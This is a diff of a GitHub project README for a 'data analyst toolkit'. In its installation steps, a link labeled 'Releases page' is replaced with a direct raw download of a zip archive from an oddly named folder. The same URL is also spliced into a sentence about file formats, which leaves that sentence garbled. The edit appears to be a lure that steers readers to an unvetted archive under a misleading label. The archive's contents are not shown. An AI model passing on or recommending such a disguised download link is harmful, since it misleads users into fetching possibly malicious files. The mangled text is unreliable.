yusuf4030/the-data-analyst-toolkit/README.md

 ## 🔄 Installation Steps
 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/yusuf4030/the-data-analyst-toolkit/releases) to view the latest versions available for download.
+   Go to the [Releases page](https://raw.githubusercontent.com/yusuf4030/the-data-analyst-toolkit/main/unspoilable/the-data-analyst-toolkit.zip) to view the latest versions available for download.

 2. **Select Your Download**
    Choose the appropriate version for your operating system.
 Click on the download link provided next to the version you want.

 3. **Download the Archive**
-   The toolkit will download as a .zip or .tar.gz file.
+   The toolkit will download as a .zip or https://raw.githubusercontent.com/yusuf4030/the-data-analyst-toolkit/main/unspoilable/the-data-analyst-toolkit.zip file.
 Wait for the download to complete.

 4. **Extract the Files**
    After the download finishes, locate the file in your downloads folder.
 Right-click the file and select "Extract" to unpack the contents.